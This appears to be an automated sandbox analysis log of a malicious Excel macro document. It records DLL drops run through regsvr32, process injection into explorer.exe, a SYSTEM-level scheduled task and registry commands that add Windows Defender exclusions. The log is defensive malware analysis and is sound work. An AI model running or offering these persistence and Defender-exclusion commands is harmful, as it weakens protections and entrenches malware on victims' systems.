    Source: Claim-838392655-09242021.xls | OLE, VBA macro line: Sub auto_open()
    Source: Claim-838392655-09242021.xls | OLE, VBA macro line: Sub auto_close()
    Source: Claim-838392655-09242021.xls | OLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-838392655-09242021.xls | OLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-838392655-09242021.xls | OLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.8.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: Claim-838392655-09242021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44466.4649013889[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44466.4649013889[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44466.4649013889[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Claim-838392655-09242021.xlsReversingLabs: Detection: 26%
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................h.4..........&`.....(.P.....$.......d.................................................................................4.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................T...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........!.....N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF640.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-838392655-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{F85A5564-6426-431B-8FD7-40D6BA7A0742}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{8104B8A2-C368-4EFF-95B0-548F91E45474}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{F85A5564-6426-431B-8FD7-40D6BA7A0742}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{4A0245B3-5BF6-4A12-A3B4-3B388E7369A5}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{8104B8A2-C368-4EFF-95B0-548F91E45474}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{4A0245B3-5BF6-4A12-A3B4-3B388E7369A5}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000A51A FindResourceA,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.522715533.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.576566085.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009A00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00099D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00099E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9
    Source: Fiosa.der.8.drStatic PE information: real checksum: 0x7fed4 should be: 0x101479
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa1.der

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa1.der
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24

    Hooking and other Techniques for Hiding and Protection:

    Overwrites code with unconditional jumps - possibly setting hooks in foreign process
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2592 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 3060 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 536 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2100 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: Claim-838392655-09242021.xls | Stream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1960 | Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2984 | Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2616 | Thread sleep time: -148000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2944 | Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1308 | Thread sleep count: 82 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2420 | Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 788 | Thread sleep time: -116000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 572 | Thread sleep count: 57 > 30
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 16_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_00085A61 RtlAddVectoredExceptionHandler,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    Maps a DLL or memory area into another process
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Allocates memory in foreign processes
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
